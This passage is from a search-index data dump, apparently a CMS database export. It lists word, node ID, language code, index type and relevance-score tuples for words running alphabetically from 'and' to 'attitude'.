('and', 108, 'en', 'node_search', 6),
('and', 108, 'ja', 'node_search', 6),
('and', 111, 'en', 'node_search', 5),
('and', 111, 'ja', 'node_search', 4),
('and', 113, 'en', 'node_search', 7),
('and', 113, 'ja', 'node_search', 6),
('and', 116, 'en', 'node_search', 2),
('and', 120, 'en', 'node_search', 6),
('and', 122, 'en', 'node_search', 2),
('and', 133, 'en', 'node_search', 3),
('and', 135, 'en', 'node_search', 4),
('and', 136, 'en', 'node_search', 1),
('and', 138, 'en', 'node_search', 48),
('and', 138, 'ja', 'node_search', 27),
('and', 140, 'en', 'node_search', 2),
('and', 142, 'en', 'node_search', 3),
('and', 154, 'en', 'node_search', 3),
('and', 155, 'en', 'node_search', 2),
('and', 156, 'en', 'node_search', 3),
('and', 157, 'en', 'node_search', 3),
('and', 160, 'en', 'node_search', 3),
('and', 161, 'en', 'node_search', 6),
('and', 162, 'en', 'node_search', 12.8791),
('and', 163, 'en', 'node_search', 10),
('and', 164, 'en', 'node_search', 2),
('and', 165, 'en', 'node_search', 5),
('and', 166, 'en', 'node_search', 4),
('and', 167, 'en', 'node_search', 1),
('and', 168, 'en', 'node_search', 4),
('and', 169, 'en', 'node_search', 4),
('and', 170, 'en', 'node_search', 4),
('and', 171, 'en', 'node_search', 5),
('and', 173, 'en', 'node_search', 4),
('and', 174, 'en', 'node_search', 6),
('and', 175, 'en', 'node_search', 3),
('and', 176, 'en', 'node_search', 3),
('and', 177, 'en', 'node_search', 5),
('and', 178, 'en', 'node_search', 3),
('and', 179, 'en', 'node_search', 5),
('and', 180, 'en', 'node_search', 5),
('and', 181, 'en', 'node_search', 7),
('and', 182, 'en', 'node_search', 12),
('and', 183, 'en', 'node_search', 5),
('and', 184, 'en', 'node_search', 5),
('and', 185, 'en', 'node_search', 4),
('and', 186, 'en', 'node_search', 4),
('and', 187, 'en', 'node_search', 4),
('and', 188, 'en', 'node_search', 4),
('and', 189, 'en', 'node_search', 32),
('and', 190, 'en', 'node_search', 33),
('and', 191, 'en', 'node_search', 4),
('and', 192, 'en', 'node_search', 32),
('and', 193, 'en', 'node_search', 3),
('and', 194, 'en', 'node_search', 6),
('and', 195, 'en', 'node_search', 31),
('and', 196, 'en', 'node_search', 5),
('and', 197, 'en', 'node_search', 5),
('and', 198, 'en', 'node_search', 4),
('and', 199, 'en', 'node_search', 4),
('and', 204, 'en', 'node_search', 4),
('and', 204, 'ja', 'node_search', 4),
('announce', 66, 'en', 'node_search', 1),
('announce', 154, 'en', 'node_search', 1),
('announce', 155, 'en', 'node_search', 1),
('announce', 160, 'en', 'node_search', 1),
('announce', 161, 'en', 'node_search', 1),
('announce', 164, 'en', 'node_search', 1),
('announce', 165, 'en', 'node_search', 1),
('announce', 166, 'en', 'node_search', 1),
('announce', 167, 'en', 'node_search', 1),
('announce', 168, 'en', 'node_search', 1),
('announce', 169, 'en', 'node_search', 1),
('announce', 170, 'en', 'node_search', 1),
('announce', 171, 'en', 'node_search', 1),
('announce', 173, 'en', 'node_search', 1),
('announce', 174, 'en', 'node_search', 1),
('announce', 175, 'en', 'node_search', 1),
('announce', 176, 'en', 'node_search', 1),
('announce', 177, 'en', 'node_search', 1),
('announce', 178, 'en', 'node_search', 1),
('announce', 180, 'en', 'node_search', 1),
('announce', 181, 'en', 'node_search', 1),
('announce', 182, 'en', 'node_search', 1),
('announce', 183, 'en', 'node_search', 1),
('announce', 184, 'en', 'node_search', 1),
('announce', 185, 'en', 'node_search', 1),
('announce', 186, 'en', 'node_search', 1),
('announce', 187, 'en', 'node_search', 1),
('announce', 188, 'en', 'node_search', 1),
('announce', 189, 'en', 'node_search', 1),
('announce', 190, 'en', 'node_search', 1),
('announce', 192, 'en', 'node_search', 1),
('announce', 193, 'en', 'node_search', 1),
('announce', 194, 'en', 'node_search', 1),
('announce', 195, 'en', 'node_search', 1),
('announce', 196, 'en', 'node_search', 1),
('announce', 197, 'en', 'node_search', 1),
('announce', 198, 'en', 'node_search', 1),
('announce', 199, 'en', 'node_search', 1),
('announcement', 38, 'en', 'help_search', 1),
('announcement', 38, 'ja', 'help_search', 1),
('announcement', 38, 'ko', 'help_search', 1),
('announcement', 161, 'en', 'node_search', 4),
('announcement', 166, 'en', 'node_search', 4),
('announcement', 178, 'en', 'node_search', 4),
('announcement', 179, 'en', 'node_search', 4),
('announcement', 185, 'en', 'node_search', 4),
('announcement', 186, 'en', 'node_search', 4),
('announcement', 187, 'en', 'node_search', 4),
('announcement', 188, 'en', 'node_search', 4),
('announcement', 189, 'en', 'node_search', 4),
('announcement', 190, 'en', 'node_search', 4),
('announcement', 191, 'en', 'node_search', 4),
('announcement', 192, 'en', 'node_search', 4),
('announcement', 193, 'en', 'node_search', 4),
('announcement', 194, 'en', 'node_search', 4),
('announcement', 195, 'en', 'node_search', 4),
('announcement', 196, 'en', 'node_search', 4),
('announcement', 197, 'en', 'node_search', 4),
('announcement', 198, 'en', 'node_search', 4),
('announcement', 199, 'en', 'node_search', 4),
('anonymous', 7, 'en', 'help_search', 6),
('anonymous', 7, 'ja', 'help_search', 6),
('anonymous', 7, 'ko', 'help_search', 6),
('anonymous', 18, 'en', 'help_search', 4),
('anonymous', 18, 'ja', 'help_search', 4),
('anonymous', 18, 'ko', 'help_search', 4),
('anonymous', 28, 'en', 'help_search', 0.886095),
('anonymous', 28, 'ja', 'help_search', 0.886095),
('anonymous', 28, 'ko', 'help_search', 0.886095),
('anonymous', 37, 'en', 'help_search', 2.93498),
('anonymous', 37, 'ja', 'help_search', 2.93498),
('anonymous', 37, 'ko', 'help_search', 2.93498),
('anonymous', 84, 'en', 'help_search', 5),
('anonymous', 84, 'ja', 'help_search', 5),
('anonymous', 84, 'ko', 'help_search', 5),
('another', 6, 'en', 'help_search', 1),
('another', 6, 'ja', 'help_search', 1),
('another', 6, 'ko', 'help_search', 1),
('another', 11, 'en', 'help_search', 1),
('another', 11, 'ja', 'help_search', 1),
('another', 11, 'ko', 'help_search', 1),
('another', 16, 'en', 'help_search', 1),
('another', 16, 'ja', 'help_search', 1),
('another', 16, 'ko', 'help_search', 1),
('another', 20, 'en', 'help_search', 1),
('another', 20, 'ja', 'help_search', 1),
('another', 20, 'ko', 'help_search', 1),
('another', 22, 'en', 'help_search', 1),
('another', 22, 'ja', 'help_search', 1),
('another', 22, 'ko', 'help_search', 1),
('another', 23, 'en', 'help_search', 0.968904),
('another', 23, 'ja', 'help_search', 0.968904),
('another', 23, 'ko', 'help_search', 0.968904),
('another', 30, 'en', 'help_search', 2.4152),
('another', 30, 'ja', 'help_search', 2.4152),
('another', 30, 'ko', 'help_search', 2.4152),
('another', 33, 'en', 'help_search', 1),
('another', 33, 'ja', 'help_search', 1),
('another', 33, 'ko', 'help_search', 1),
('another', 41, 'en', 'help_search', 1),
('another', 41, 'ja', 'help_search', 1),
('another', 41, 'ko', 'help_search', 1),
('another', 46, 'en', 'help_search', 0.997306),
('another', 46, 'ja', 'help_search', 0.997306),
('another', 46, 'ko', 'help_search', 0.997306),
('another', 56, 'en', 'help_search', 2),
('another', 56, 'ja', 'help_search', 2),
('another', 56, 'ko', 'help_search', 2),
('another', 75, 'en', 'help_search', 1),
('another', 75, 'ja', 'help_search', 1),
('another', 75, 'ko', 'help_search', 1),
('another', 77, 'en', 'help_search', 1),
('another', 77, 'ja', 'help_search', 1),
('another', 77, 'ko', 'help_search', 1),
('another', 78, 'en', 'help_search', 1),
('another', 78, 'ja', 'help_search', 1),
('another', 78, 'ko', 'help_search', 1),
('another', 179, 'en', 'node_search', 1),
('answer', 29, 'en', 'node_search', 3),
('any', 1, 'en', 'node_search', 1),
('any', 14, 'en', 'help_search', 1),
('any', 14, 'ja', 'help_search', 1),
('any', 14, 'ko', 'help_search', 1),
('any', 23, 'en', 'help_search', 1),
('any', 23, 'ja', 'help_search', 1),
('any', 23, 'ko', 'help_search', 1),
('any', 25, 'en', 'help_search', 1),
('any', 25, 'ja', 'help_search', 1),
('any', 26, 'en', 'help_search', 1),
('any', 26, 'ja', 'help_search', 1),
('any', 26, 'ko', 'help_search', 1),
('any', 29, 'en', 'help_search', 1),
('any', 29, 'ja', 'help_search', 1),
('any', 29, 'ko', 'help_search', 1),
('any', 30, 'en', 'help_search', 0.876337),
('any', 30, 'ja', 'help_search', 0.876337),
('any', 30, 'ko', 'help_search', 0.876337),
('any', 38, 'en', 'help_search', 1),
('any', 38, 'ja', 'help_search', 1),
('any', 38, 'ko', 'help_search', 1),
('any', 53, 'en', 'help_search', 2),
('any', 53, 'ja', 'help_search', 2),
('any', 53, 'ko', 'help_search', 2),
('any', 54, 'en', 'help_search', 1),
('any', 54, 'ja', 'help_search', 1),
('any', 54, 'ko', 'help_search', 1),
('any', 56, 'en', 'help_search', 1),
('any', 56, 'ja', 'help_search', 1),
('any', 56, 'ko', 'help_search', 1),
('any', 61, 'en', 'help_search', 4),
('any', 61, 'ja', 'help_search', 4),
('any', 61, 'ko', 'help_search', 4),
('any', 64, 'en', 'help_search', 1),
('any', 64, 'ja', 'help_search', 1),
('any', 64, 'ko', 'help_search', 1),
('any', 66, 'en', 'help_search', 1),
('any', 66, 'ja', 'help_search', 1),
('any', 68, 'en', 'help_search', 0.920273),
('any', 68, 'ja', 'help_search', 0.920273),
('any', 68, 'ko', 'help_search', 0.920273),
('any', 69, 'en', 'help_search', 5.95723),
('any', 69, 'ja', 'help_search', 5.95723),
('any', 69, 'ko', 'help_search', 5.95723),
('any', 71, 'en', 'help_search', 2),
('any', 71, 'ja', 'help_search', 2),
('any', 71, 'ko', 'help_search', 2),
('any', 76, 'en', 'help_search', 3),
('any', 76, 'ja', 'help_search', 3),
('any', 76, 'ko', 'help_search', 3),
('any', 80, 'en', 'help_search', 1),
('any', 80, 'ja', 'help_search', 1),
('any', 80, 'ko', 'help_search', 1),
('any', 87, 'en', 'node_search', 1),
('any', 136, 'en', 'node_search', 1),
('anyone', 73, 'en', 'help_search', 1),
('anyone', 73, 'ja', 'help_search', 1),
('anyone', 73, 'ko', 'help_search', 1),
('anyone', 84, 'en', 'help_search', 1),
('anyone', 84, 'ja', 'help_search', 1),
('anyone', 84, 'ko', 'help_search', 1),
('apache', 68, 'en', 'help_search', 12),
('apache', 68, 'ja', 'help_search', 12),
('apache', 68, 'ko', 'help_search', 12),
('api', 6, 'en', 'help_search', 0.961087),
('api', 6, 'ja', 'help_search', 0.961087),
('api', 6, 'ko', 'help_search', 0.961087),
('api', 44, 'en', 'help_search', 34),
('api', 44, 'ja', 'help_search', 34),
('api', 44, 'ko', 'help_search', 34),
('appear', 25, 'ja', 'help_search', 1),
('appear', 39, 'en', 'help_search', 2),
('appear', 39, 'ja', 'help_search', 2),
('appear', 39, 'ko', 'help_search', 2),
('appear', 64, 'en', 'help_search', 1),
('appear', 64, 'ja', 'help_search', 1),
('appear', 64, 'ko', 'help_search', 1),
('appear', 81, 'en', 'help_search', 1),
('appear', 81, 'ja', 'help_search', 1),
('appear', 81, 'ko', 'help_search', 1),
('appear', 92, 'en', 'help_search', 1),
('appear', 92, 'ja', 'help_search', 1),
('appear', 92, 'ko', 'help_search', 1),
('appearance', 29, 'en', 'help_search', 46.9579),
('appearance', 29, 'ja', 'help_search', 46.9579),
('appearance', 29, 'ko', 'help_search', 46.9579),
('appearance', 43, 'en', 'help_search', 3.8289),
('appearance', 43, 'ja', 'help_search', 3.8289),
('appearance', 43, 'ko', 'help_search', 3.8289),
('appearance', 77, 'en', 'help_search', 8),
('appearance', 77, 'ja', 'help_search', 8),
('appearance', 77, 'ko', 'help_search', 8),
('appearance', 78, 'en', 'help_search', 4),
('appearance', 78, 'ja', 'help_search', 4),
('appearance', 78, 'ko', 'help_search', 4),
('applicants', 162, 'en', 'node_search', 0.899454),
('applicantsnew', 135, 'en', 'node_search', 1),
('application', 24, 'en', 'node_search', 1),
('applications', 44, 'en', 'help_search', 3),
('applications', 44, 'ja', 'help_search', 3),
('applications', 44, 'ko', 'help_search', 3),
('applications', 133, 'en', 'node_search', 1),
('applied', 23, 'en', 'node_search', 1),
('applied', 28, 'en', 'help_search', 1),
('applied', 28, 'ja', 'help_search', 1),
('applied', 28, 'ko', 'help_search', 1),
('applied', 35, 'en', 'help_search', 1),
('applied', 35, 'ja', 'help_search', 1),
('applied', 35, 'ko', 'help_search', 1),
('applied', 89, 'en', 'help_search', 1),
('applied', 89, 'ja', 'help_search', 1),
('applied', 89, 'ko', 'help_search', 1),
('applies', 7, 'en', 'help_search', 1),
('applies', 7, 'ja', 'help_search', 1),
('applies', 7, 'ko', 'help_search', 1),
('apply', 6, 'en', 'help_search', 1),
('apply', 6, 'ja', 'help_search', 1),
('apply', 6, 'ko', 'help_search', 1),
('apply', 10, 'en', 'help_search', 8),
('apply', 10, 'ja', 'help_search', 8),
('apply', 10, 'ko', 'help_search', 8),
('apply', 38, 'en', 'help_search', 1),
('apply', 38, 'ja', 'help_search', 1),
('apply', 38, 'ko', 'help_search', 1),
('apply', 48, 'en', 'help_search', 1),
('apply', 48, 'ja', 'help_search', 1),
('apply', 48, 'ko', 'help_search', 1),
('apply', 61, 'en', 'help_search', 4.97258),
('apply', 61, 'ja', 'help_search', 4.97258),
('apply', 61, 'ko', 'help_search', 4.97258),
('apply', 89, 'en', 'help_search', 4),
('apply', 89, 'ja', 'help_search', 4),
('apply', 89, 'ko', 'help_search', 4),
('apply', 93, 'en', 'help_search', 0.842342),
('apply', 93, 'ja', 'help_search', 0.842342),
('apply', 93, 'ko', 'help_search', 0.842342),
('apply', 195, 'en', 'node_search', 1),
('appointed', 27, 'en', 'node_search', 0.636679),
('appointments', 162, 'en', 'node_search', 1),
('apprehension', 138, 'en', 'node_search', 1),
('approach', 66, 'en', 'node_search', 1),
('approach', 136, 'en', 'node_search', 1),
('approach', 138, 'en', 'node_search', 1),
('appropriate', 7, 'en', 'help_search', 1),
('appropriate', 7, 'ja', 'help_search', 1),
('appropriate', 7, 'ko', 'help_search', 1),
('appropriate', 68, 'en', 'help_search', 1),
('appropriate', 68, 'ja', 'help_search', 1),
('appropriate', 68, 'ko', 'help_search', 1),
('appropriate', 133, 'en', 'node_search', 1),
('appropriately', 72, 'en', 'help_search', 1),
('appropriately', 72, 'ja', 'help_search', 1),
('appropriately', 72, 'ko', 'help_search', 1),
('approval', 86, 'en', 'help_search', 1),
('approval', 86, 'ja', 'help_search', 1),
('approval', 86, 'ko', 'help_search', 1),
('approved', 86, 'en', 'help_search', 1),
('approved', 86, 'ja', 'help_search', 1),
('approved', 86, 'ko', 'help_search', 1),
('approximate', 31, 'en', 'node_search', 1),
('approximately', 162, 'en', 'node_search', 1.95423),
('april', 126, 'en', 'node_search', 2),
('april', 156, 'en', 'node_search', 2),
('april', 157, 'en', 'node_search', 2),
('april', 167, 'en', 'node_search', 6),
('april', 171, 'en', 'node_search', 9),
('april', 173, 'en', 'node_search', 9),
('april', 174, 'en', 'node_search', 6),
('architectural', 27, 'en', 'node_search', 1),
('archive', 12, 'en', 'help_search', 2),
('archive', 12, 'ja', 'help_search', 2),
('archive', 12, 'ko', 'help_search', 2),
('archive', 14, 'en', 'help_search', 6),
('archive', 14, 'ja', 'help_search', 6),
('archive', 14, 'ko', 'help_search', 6),
('archive', 30, 'en', 'help_search', 1.60282),
('archive', 30, 'ja', 'help_search', 1.60282),
('archive', 30, 'ko', 'help_search', 1.60282),
('are', 1, 'en', 'node_search', 2),
('are', 2, 'en', 'help_search', 41),
('are', 2, 'ja', 'help_search', 41),
('are', 2, 'ko', 'help_search', 41),
('are', 5, 'en', 'node_search', 3),
('are', 5, 'ko', 'node_search', 3),
('are', 6, 'en', 'help_search', 62),
('are', 6, 'en', 'node_search', 3),
('are', 6, 'ja', 'help_search', 62),
('are', 6, 'ko', 'help_search', 62),
('are', 7, 'en', 'help_search', 7.50101),
('are', 7, 'en', 'node_search', 2),
('are', 7, 'ja', 'help_search', 7.50101),
('are', 7, 'ko', 'help_search', 7.50101),
('are', 7, 'ko', 'node_search', 2),
('are', 9, 'en', 'help_search', 5),
('are', 9, 'ja', 'help_search', 5),
('are', 9, 'ko', 'help_search', 5),
('are', 10, 'en', 'help_search', 2),
('are', 10, 'en', 'node_search', 28),
('are', 10, 'ja', 'help_search', 2),
('are', 10, 'ko', 'help_search', 2),
('are', 10, 'ko', 'node_search', 28),
('are', 11, 'en', 'help_search', 5),
('are', 11, 'ja', 'help_search', 5),
('are', 11, 'ko', 'help_search', 5),
('are', 17, 'en', 'help_search', 19),
('are', 17, 'ja', 'help_search', 19),
('are', 17, 'ko', 'help_search', 19),
('are', 18, 'en', 'help_search', 1),
('are', 18, 'en', 'node_search', 29),
('are', 18, 'ja', 'help_search', 1),
('are', 18, 'ko', 'help_search', 1),
('are', 18, 'ko', 'node_search', 29),
('are', 20, 'en', 'help_search', 21),
('are', 20, 'ja', 'help_search', 21),
('are', 20, 'ko', 'help_search', 21),
('are', 22, 'en', 'help_search', 19),
('are', 22, 'ja', 'help_search', 19),
('are', 22, 'ko', 'help_search', 19),
('are', 23, 'en', 'help_search', 2),
('are', 23, 'en', 'node_search', 3.40912),
('are', 23, 'ja', 'help_search', 2),
('are', 23, 'ko', 'help_search', 2),
('are', 24, 'en', 'help_search', 1),
('are', 24, 'en', 'node_search', 6.32436),
('are', 24, 'ja', 'help_search', 1),
('are', 24, 'ko', 'help_search', 1),
('are', 25, 'ja', 'help_search', 1),
('are', 26, 'en', 'help_search', 1),
('are', 26, 'en', 'node_search', 1),
('are', 26, 'ja', 'help_search', 1),
('are', 26, 'ko', 'help_search', 1),
('are', 27, 'en', 'help_search', 1),
('are', 27, 'en', 'node_search', 2.51284),
('are', 27, 'ja', 'help_search', 1),
('are', 27, 'ko', 'help_search', 1),
('are', 28, 'en', 'help_search', 42),
('are', 28, 'ja', 'help_search', 42),
('are', 28, 'ko', 'help_search', 42),
('are', 29, 'en', 'help_search', 1),
('are', 29, 'ja', 'help_search', 1),
('are', 29, 'ko', 'help_search', 1),
('are', 30, 'en', 'help_search', 24.2128),
('are', 30, 'ja', 'help_search', 24.2128),
('are', 30, 'ko', 'help_search', 24.2128),
('are', 31, 'en', 'node_search', 29),
('are', 31, 'ja', 'help_search', 59.5296),
('are', 32, 'en', 'help_search', 39.9973),
('are', 32, 'ja', 'help_search', 39.9973),
('are', 32, 'ko', 'help_search', 39.9973),
('are', 33, 'en', 'help_search', 19),
('are', 33, 'ja', 'help_search', 19),
('are', 33, 'ko', 'help_search', 19),
('are', 34, 'en', 'help_search', 3),
('are', 34, 'ja', 'help_search', 3),
('are', 34, 'ko', 'help_search', 3),
('are', 35, 'en', 'help_search', 23),
('are', 35, 'ja', 'help_search', 23),
('are', 35, 'ko', 'help_search', 23),
('are', 37, 'en', 'help_search', 4.78255),
('are', 37, 'ja', 'help_search', 4.78255),
('are', 37, 'ko', 'help_search', 4.78255),
('are', 38, 'en', 'help_search', 44),
('are', 38, 'ja', 'help_search', 44),
('are', 38, 'ko', 'help_search', 44),
('are', 41, 'en', 'help_search', 2),
('are', 41, 'ja', 'help_search', 2),
('are', 41, 'ko', 'help_search', 2),
('are', 42, 'en', 'help_search', 3.98902),
('are', 42, 'ja', 'help_search', 3.98902),
('are', 42, 'ko', 'help_search', 3.98902),
('are', 43, 'en', 'help_search', 41),
('are', 43, 'ja', 'help_search', 41),
('are', 43, 'ko', 'help_search', 41),
('are', 44, 'en', 'help_search', 2),
('are', 44, 'ja', 'help_search', 2),
('are', 44, 'ko', 'help_search', 2),
('are', 45, 'en', 'help_search', 2),
('are', 45, 'ja', 'help_search', 2),
('are', 45, 'ko', 'help_search', 2),
('are', 46, 'en', 'help_search', 61),
('are', 46, 'ja', 'help_search', 61),
('are', 46, 'ko', 'help_search', 61),
('are', 47, 'en', 'help_search', 39),
('are', 47, 'ja', 'help_search', 39),
('are', 47, 'ko', 'help_search', 39),
('are', 48, 'en', 'help_search', 1),
('are', 48, 'ja', 'help_search', 1),
('are', 48, 'ko', 'help_search', 1),
('are', 49, 'en', 'help_search', 1),
('are', 49, 'ja', 'help_search', 1),
('are', 49, 'ko', 'help_search', 1),
('are', 50, 'en', 'help_search', 22),
('are', 50, 'ja', 'help_search', 22),
('are', 50, 'ko', 'help_search', 22),
('are', 53, 'en', 'help_search', 1),
('are', 53, 'ja', 'help_search', 1),
('are', 53, 'ko', 'help_search', 1),
('are', 54, 'en', 'help_search', 1),
('are', 54, 'ja', 'help_search', 1),
('are', 54, 'ko', 'help_search', 1),
('are', 62, 'en', 'help_search', 2),
('are', 62, 'ja', 'help_search', 2),
('are', 62, 'ko', 'help_search', 2),
('are', 65, 'en', 'help_search', 2),
('are', 65, 'ja', 'help_search', 2),
('are', 65, 'ko', 'help_search', 2),
('are', 66, 'en', 'node_search', 2.98902),
('are', 67, 'en', 'help_search', 1),
('are', 67, 'ja', 'help_search', 1),
('are', 67, 'ko', 'help_search', 1),
('are', 68, 'en', 'help_search', 58.7594),
('are', 68, 'ja', 'help_search', 58.7594),
('are', 68, 'ko', 'help_search', 58.7594),
('are', 69, 'en', 'help_search', 21),
('are', 69, 'ja', 'help_search', 21),
('are', 69, 'ko', 'help_search', 21),
('are', 70, 'en', 'help_search', 2),
('are', 70, 'ja', 'help_search', 2),
('are', 70, 'ko', 'help_search', 2),
('are', 71, 'en', 'help_search', 1),
('are', 71, 'ja', 'help_search', 1),
('are', 71, 'ko', 'help_search', 1),
('are', 72, 'en', 'help_search', 19.9097),
('are', 72, 'ja', 'help_search', 19.9097),
('are', 72, 'ko', 'help_search', 19.9097),
('are', 73, 'en', 'help_search', 1),
('are', 73, 'ja', 'help_search', 1),
('are', 73, 'ko', 'help_search', 1),
('are', 74, 'en', 'help_search', 1),
('are', 74, 'ja', 'help_search', 1),
('are', 74, 'ko', 'help_search', 1),
('are', 75, 'en', 'help_search', 2),
('are', 75, 'ja', 'help_search', 2),
('are', 75, 'ko', 'help_search', 2),
('are', 76, 'en', 'help_search', 2),
('are', 76, 'ja', 'help_search', 2),
('are', 76, 'ko', 'help_search', 2),
('are', 79, 'en', 'help_search', 1),
('are', 79, 'ja', 'help_search', 1),
('are', 79, 'ko', 'help_search', 1),
('are', 80, 'en', 'help_search', 4.96109),
('are', 80, 'ja', 'help_search', 4.96109),
('are', 80, 'ko', 'help_search', 4.96109),
('are', 81, 'en', 'help_search', 20),
('are', 81, 'ja', 'help_search', 20),
('are', 81, 'ko', 'help_search', 20),
('are', 82, 'en', 'help_search', 1),
('are', 82, 'ja', 'help_search', 1),
('are', 82, 'ko', 'help_search', 1),
('are', 84, 'en', 'help_search', 6),
('are', 84, 'ja', 'help_search', 6),
('are', 84, 'ko', 'help_search', 6),
('are', 86, 'en', 'help_search', 69.9769),
('are', 86, 'ja', 'help_search', 69.9769),
('are', 86, 'ko', 'help_search', 69.9769),
('are', 87, 'en', 'node_search', 1),
('are', 88, 'en', 'help_search', 2),
('are', 88, 'ja', 'help_search', 2),
('are', 88, 'ko', 'help_search', 2),
('are', 89, 'en', 'help_search', 2),
('are', 89, 'ja', 'help_search', 2),
('are', 89, 'ko', 'help_search', 2),
('are', 91, 'en', 'help_search', 2),
('are', 91, 'ja', 'help_search', 2),
('are', 91, 'ko', 'help_search', 2),
('are', 92, 'en', 'help_search', 2.99315),
('are', 92, 'ja', 'help_search', 2.99315),
('are', 92, 'ko', 'help_search', 2.99315),
('are', 93, 'en', 'help_search', 37.225),
('are', 93, 'ja', 'help_search', 37.225),
('are', 93, 'ko', 'help_search', 37.225),
('are', 116, 'en', 'node_search', 1),
('are', 135, 'en', 'node_search', 2),
('are', 140, 'en', 'node_search', 1),
('are', 142, 'en', 'node_search', 3),
('are', 150, 'en', 'node_search', 1),
('are', 156, 'en', 'node_search', 1),
('are', 157, 'en', 'node_search', 2),
('are', 162, 'en', 'node_search', 0.873132),
('are', 165, 'en', 'node_search', 1),
('are', 176, 'en', 'node_search', 2),
('are', 182, 'en', 'node_search', 1),
('are', 183, 'en', 'node_search', 1),
('are', 186, 'en', 'node_search', 1),
('are', 187, 'en', 'node_search', 1),
('are', 188, 'en', 'node_search', 1),
('are', 195, 'en', 'node_search', 1),
('are', 197, 'en', 'node_search', 1),
('are', 198, 'en', 'node_search', 1),
('area', 2, 'en', 'help_search', 1),
('area', 2, 'ja', 'help_search', 1),
('area', 2, 'ko', 'help_search', 1),
('area', 22, 'en', 'help_search', 5.98902),
('area', 22, 'ja', 'help_search', 5.98902),
('area', 22, 'ko', 'help_search', 5.98902),
('area', 87, 'en', 'help_search', 1),
('area', 87, 'ja', 'help_search', 1),
('area', 87, 'ko', 'help_search', 1),
('area', 162, 'en', 'node_search', 1),
('areas', 22, 'en', 'help_search', 1),
('areas', 22, 'ja', 'help_search', 1),
('areas', 22, 'ko', 'help_search', 1),
('areas', 27, 'en', 'node_search', 0.784336),
('around', 3, 'en', 'node_search', 1),
('around', 3, 'ko', 'node_search', 1),
('arrange', 5, 'en', 'node_search', 1),
('arrange', 5, 'ko', 'node_search', 1),
('arranged', 24, 'en', 'node_search', 0.866793),
('arrangements', 136, 'en', 'node_search', 1),
('arrival', 126, 'en', 'node_search', 46),
('arrival', 126, 'ja', 'node_search', 27),
('arrival', 142, 'en', 'node_search', 1),
('arrive', 126, 'en', 'node_search', 1),
('arriving', 3, 'en', 'node_search', 1),
('arriving', 3, 'ko', 'node_search', 1),
('arrows', 25, 'en', 'help_search', 1),
('arrows', 25, 'ja', 'help_search', 1),
('arrows', 26, 'en', 'help_search', 1),
('arrows', 26, 'ja', 'help_search', 1),
('arrows', 26, 'ko', 'help_search', 1),
('article', 59, 'en', 'help_search', 2),
('article', 59, 'ja', 'help_search', 2),
('article', 59, 'ko', 'help_search', 2),
('article', 61, 'en', 'help_search', 11),
('article', 61, 'ja', 'help_search', 11),
('article', 61, 'ko', 'help_search', 11),
('articles', 11, 'en', 'help_search', 1),
('articles', 11, 'ja', 'help_search', 1),
('articles', 11, 'ko', 'help_search', 1),
('articles', 62, 'en', 'help_search', 1),
('articles', 62, 'ja', 'help_search', 1),
('articles', 62, 'ko', 'help_search', 1),
('aspect', 43, 'en', 'help_search', 0.869951),
('aspect', 43, 'ja', 'help_search', 0.869951),
('aspect', 43, 'ko', 'help_search', 0.869951),
('aspects', 43, 'en', 'help_search', 0.857458),
('aspects', 43, 'ja', 'help_search', 0.857458),
('aspects', 43, 'ko', 'help_search', 0.857458),
('aspects', 122, 'en', 'node_search', 1),
('assessments', 142, 'en', 'node_search', 1),
('asset', 29, 'en', 'help_search', 1),
('asset', 29, 'ja', 'help_search', 1),
('asset', 29, 'ko', 'help_search', 1),
('assign', 6, 'en', 'help_search', 0.953396),
('assign', 6, 'ja', 'help_search', 0.953396),
('assign', 6, 'ko', 'help_search', 0.953396),
('assign', 28, 'en', 'help_search', 1),
('assign', 28, 'ja', 'help_search', 1),
('assign', 28, 'ko', 'help_search', 1),
('assigned', 69, 'en', 'help_search', 1),
('assigned', 69, 'ja', 'help_search', 1),
('assigned', 69, 'ko', 'help_search', 1),
('assigned', 84, 'en', 'help_search', 2),
('assigned', 84, 'ja', 'help_search', 2),
('assigned', 84, 'ko', 'help_search', 2),
('assistance', 1, 'en', 'node_search', 1),
('assistance', 62, 'en', 'node_search', 1),
('assistance', 162, 'en', 'node_search', 2),
('assistant', 30, 'en', 'node_search', 1),
('assisting', 23, 'en', 'node_search', 0.873132),
('assistive', 42, 'en', 'help_search', 1),
('assistive', 42, 'ja', 'help_search', 1),
('assistive', 42, 'ko', 'help_search', 1),
('associate', 28, 'en', 'help_search', 1),
('associate', 28, 'ja', 'help_search', 1),
('associate', 28, 'ko', 'help_search', 1),
('associate', 35, 'en', 'help_search', 1),
('associate', 35, 'ja', 'help_search', 1),
('associate', 35, 'ko', 'help_search', 1),
('associated', 23, 'en', 'help_search', 1),
('associated', 23, 'ja', 'help_search', 1),
('associated', 23, 'ko', 'help_search', 1),
('assume', 23, 'en', 'help_search', 0.957226),
('assume', 23, 'ja', 'help_search', 0.957226),
('assume', 23, 'ko', 'help_search', 0.957226),
('assuming', 60, 'en', 'help_search', 1),
('assuming', 60, 'ja', 'help_search', 1),
('assuming', 60, 'ko', 'help_search', 1),
('assumptions', 70, 'en', 'help_search', 1),
('assumptions', 70, 'ja', 'help_search', 1),
('assumptions', 70, 'ko', 'help_search', 1),
('attach', 2, 'en', 'help_search', 1),
('attach', 2, 'ja', 'help_search', 1),
('attach', 2, 'ko', 'help_search', 1),
('attach', 11, 'en', 'help_search', 1.77549),
('attach', 11, 'ja', 'help_search', 1.77549),
('attach', 11, 'ko', 'help_search', 1.77549),
('attach', 62, 'en', 'help_search', 1),
('attach', 62, 'ja', 'help_search', 1),
('attach', 62, 'ko', 'help_search', 1),
('attached', 7, 'en', 'help_search', 1),
('attached', 7, 'ja', 'help_search', 1),
('attached', 7, 'ko', 'help_search', 1),
('attached', 11, 'en', 'help_search', 1),
('attached', 11, 'ja', 'help_search', 1),
('attached', 11, 'ko', 'help_search', 1),
('attached', 31, 'ja', 'help_search', 1),
('attached', 62, 'en', 'help_search', 1),
('attached', 62, 'ja', 'help_search', 1),
('attached', 62, 'ko', 'help_search', 1),
('attached', 80, 'en', 'help_search', 2),
('attached', 80, 'ja', 'help_search', 2),
('attached', 80, 'ko', 'help_search', 2),
('attend', 3, 'en', 'node_search', 43),
('attend', 3, 'ko', 'node_search', 43),
('attend', 31, 'en', 'node_search', 1),
('attendance', 140, 'en', 'node_search', 1),
('attention', 3, 'en', 'node_search', 0.993146),
('attention', 3, 'ko', 'node_search', 0.98493),
('attention', 27, 'en', 'node_search', 0.813674),
('attention', 85, 'en', 'help_search', 1),
('attention', 85, 'ja', 'help_search', 1),
('attention', 85, 'ko', 'help_search', 1),
('attitude', 191, 'en', 'node_search', 1),
